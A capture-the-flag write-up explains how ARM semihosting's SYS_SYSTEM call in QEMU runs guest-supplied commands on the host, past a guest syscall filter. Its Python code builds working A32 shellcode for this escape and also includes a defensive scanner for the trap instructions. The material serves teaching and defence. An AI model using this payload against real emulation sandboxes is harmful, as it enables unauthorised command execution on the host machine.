By: unvariant

Tags: pwn NBCTF-2023

Problem Description:



QEMU supports semihosting, a mechanism that lets code running on an embedded target ask the host for services (file I/O, console output, the time, running a command) that the target itself may not have. In hardware the "host" is the debugger attached to the processor; under emulation it is QEMU, which catches the semihosting trap and performs the requested operation on the machine running QEMU.

The ABI defines two instructions that trap into the semihosting handler from 32-bit ARM (A32) code (Thumb code uses svc #0xab instead). In either case the operation number is passed in r0 and a pointer to the operation's parameter block in r1, and the result comes back in r0.

svc #0x123456

hlt #0xf000

Among the operations the semihosting interface defines is SYS_SYSTEM (operation number 0x12), which runs a shell command on the host; its parameter block is two words, a pointer to the command string and the string's length. QEMU implements it by handing the guest-supplied string straight to the C library's system(). Most importantly, the trap is handled by QEMU's semihosting code rather than its guest syscall dispatcher: no guest syscall is ever made, so a filter applied to guest syscalls never sees the command and it runs on the host with the privileges of the QEMU process. (In system emulation the trap is only honoured when QEMU is started with -semihosting; the user-mode qemu-arm used for challenges like this one handles it without any extra flag.)
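To make the calling convention concrete, here is an added example (my own code, not the author's exploit or anything from QEMU) that hand-assembles a position-independent A32 payload invoking SYS_SYSTEM, models the run-time pointer fix-up so the parameter block can be checked offline, and includes a small scanner that flags semihosting traps in a blob of guest code. The parameter block layout (pointer, then length) and the operation number 0x12 come from the ARM semihosting specification; the payload exits through an ordinary Linux exit syscall afterwards, which assumes that exit is allowed by the filter. The encodings were checked by hand and the payload is not executed here.

```python
"""Hand-assembled ARM semihosting SYS_SYSTEM payload plus a trap scanner.

Added example for this writeup; not the challenge author's exploit and not
QEMU code. Encodings are little-endian A32 words checked by hand.
"""
import struct

# Operation number from the ARM semihosting spec.
SYS_SYSTEM = 0x12  # run a host command; QEMU hands the string to system(3)

# Trap encodings: the two A32 forms from the writeup plus the Thumb form.
A32_SVC_SEMIHOST = 0xEF123456  # svc #0x123456
A32_HLT_SEMIHOST = 0xE10F0070  # hlt #0xf000
T32_SVC_SEMIHOST = 0xDFAB      # svc #0xab (16-bit Thumb)

PARAMS_OFF = 0x1C  # offset of the two-word parameter block in the payload
CMD_OFF = 0x24     # offset of the NUL-terminated command string


def build_sys_system_payload(cmd: bytes) -> bytes:
    """Position-independent A32 shellcode that runs `cmd` on the host.

    Layout (byte offsets; in A32, pc reads as the current instruction + 8):
      0x00 mov r0, #0x12      ; r0 = SYS_SYSTEM
      0x04 add r1, pc, #0x10  ; r1 = 0x1c = &params
      0x08 add r2, pc, #0x14  ; r2 = 0x24 = &cmd
      0x0c str r2, [r1]       ; params[0] = &cmd, resolved at run time
      0x10 svc #0x123456      ; semihosting trap: no guest syscall is made
      0x14 mov r7, #1         ; exit(r0) through the normal syscall path
      0x18 svc #0             ; (assumes exit is permitted by the filter)
      0x1c .word 0            ; params[0]: pointer to command, patched above
      0x20 .word len(cmd)     ; params[1]: command length, excluding the NUL
      0x24 .asciz cmd
    """
    code = [
        0xE3A00012,        # mov r0, #0x12
        0xE28F1010,        # add r1, pc, #0x10
        0xE28F2014,        # add r2, pc, #0x14
        0xE5812000,        # str r2, [r1]
        A32_SVC_SEMIHOST,  # svc #0x123456
        0xE3A07001,        # mov r7, #1
        0xEF000000,        # svc #0
    ]
    words = b"".join(struct.pack("<I", w) for w in code)
    params = struct.pack("<II", 0, len(cmd))
    return words + params + cmd + b"\0"


def patch_params(payload: bytes, base: int) -> bytes:
    """Model the run-time `str r2, [r1]` for a payload loaded at guest address
    `base`, so the parameter block can be inspected without running it."""
    ptr = struct.pack("<I", base + CMD_OFF)
    return payload[:PARAMS_OFF] + ptr + payload[PARAMS_OFF + 4:]


def decode_sys_system_params(blob: bytes, params_off: int, base: int) -> bytes:
    """Read a SYS_SYSTEM parameter block and return the command it points at.

    `base` is the guest address of blob[0]; it turns the pointer in params[0]
    back into an offset into `blob`.
    """
    ptr, length = struct.unpack_from("<II", blob, params_off)
    start = ptr - base
    return blob[start:start + length]


def find_semihosting_traps(blob: bytes):
    """Return (offset, mnemonic) for every semihosting trap found in `blob`.

    A32 words are checked at 4-byte alignment, Thumb halfwords at 2-byte
    alignment. This is a raw byte match: it can hit data as well as code, so
    treat a hit as something to inspect, not proof of intent.
    """
    hits = []
    for off in range(0, len(blob) - 3, 4):
        word = struct.unpack_from("<I", blob, off)[0]
        if word == A32_SVC_SEMIHOST:
            hits.append((off, "svc #0x123456"))
        elif word == A32_HLT_SEMIHOST:
            hits.append((off, "hlt #0xf000"))
    for off in range(0, len(blob) - 1, 2):
        if struct.unpack_from("<H", blob, off)[0] == T32_SVC_SEMIHOST:
            hits.append((off, "svc #0xab (thumb)"))
    return sorted(hits)


if __name__ == "__main__":
    payload = build_sys_system_payload(b"id")
    print(payload.hex())
    print(find_semihosting_traps(payload))
    print(decode_sys_system_params(patch_params(payload, 0x10000), PARAMS_OFF, 0x10000))
```

The scanner is the defensive half of the story: a guest-syscall filter cannot see SYS_SYSTEM, so if you need to keep untrusted guest code away from the host shell, either disable semihosting or look for these trap encodings before running the code, keeping in mind that both the svc and hlt forms have to be covered.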